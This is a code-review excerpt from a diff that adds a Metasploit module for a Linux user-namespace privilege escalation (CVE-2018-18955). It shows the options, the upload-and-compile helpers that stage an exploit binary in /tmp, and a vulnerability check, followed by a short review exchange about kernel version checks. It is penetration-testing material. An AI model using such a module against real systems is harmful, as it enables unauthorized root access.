modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb

```diff
@@ -0,0 +1,227 @@
+          ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19'],
+          ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2']
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' =>
+        {
+          'AppendExit'       => true,
+          'PrependSetresuid' => true,
+          'PrependSetreuid'  => true,
+          'PrependSetuid'    => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 60
+        },
+      'Notes' =>
+        {
+          'AKA' => ['subuid_shell.c']
+        }
+      ))
+    register_options [
+      OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', %w[Auto True False]])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+    output = cmd_exec gcc_cmd
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
+    end
+
+    register_file_for_cleanup path
+    cmd_exec "chmod +x #{path}"
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file
+    fd = ::File.open path, 'rb'
+    data = fd.read fd.stat.size
+    fd.close
+    data
+  end
+
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    unless userns_enabled?
+      vprint_error 'Unprivileged user namespaces are not permitted'
+      return CheckCode::Safe
+    end
+    vprint_good 'Unprivileged user namespaces are permitted'
+
+    ['/usr/bin/newuidmap', '/usr/bin/newgidmap'].each do |path|
+      unless setuid? path
+        vprint_error "#{path} is not set-uid"
+        return CheckCode::Safe
+      end
+      vprint_good "#{path} is set-uid"
+    end
+
+    release = kernel_release
+    if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.19.2') ||
```

Comment:
should this check for patched 4.18 kernels too?

Reply:
It should. Fixed.

Although, checking the kernel version is always going to be problematic, due to distros rolling their own versioning scheme.